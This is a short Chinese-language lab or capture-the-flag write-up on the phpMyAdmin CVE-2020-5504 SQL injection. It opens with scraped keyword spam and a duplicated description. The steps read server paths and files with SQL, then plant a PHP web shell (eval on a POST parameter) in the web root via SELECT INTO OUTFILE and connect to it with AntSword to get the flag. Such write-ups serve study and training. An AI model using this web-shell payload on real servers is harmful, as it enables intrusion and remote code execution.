青岛网站建设平台,企业营销策划书模板范文,网站核验单,中网互联网站建设phpmyadmin SQL注入 _#xff08;CVE-2020-5504#xff09;
漏洞信息
CVE-2020-5504sql注入漏洞Phpmyadmin 5.00以下
描述
phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库#xff0c;创建、删除、修改数据库表CVE-2020-5504
漏洞信息
CVE-2020-5504sql注入漏洞Phpmyadmin 5.00以下
描述
phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库创建、删除、修改数据库表执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 路径/pma/index.php 密码root123456
复现过程
进入首页登录 输入
select datadir #查询数据库路径输入 select basedir #查询MYSQL数据库的安装路径输入
SELECT load_file(/var/www/html/pma/index.php)大小为3kb 证明有东西应该就是首页那网站的路径即为/var/www/html/pma
插入一条木马
select ?php echo \pre\;eval($_POST[999]); echo \/pre\; ? INTO OUTFILE /var/www/html/pma/199.php使用蚁剑连接
http://10.9.47.6:26535/pma/199.php获取flag
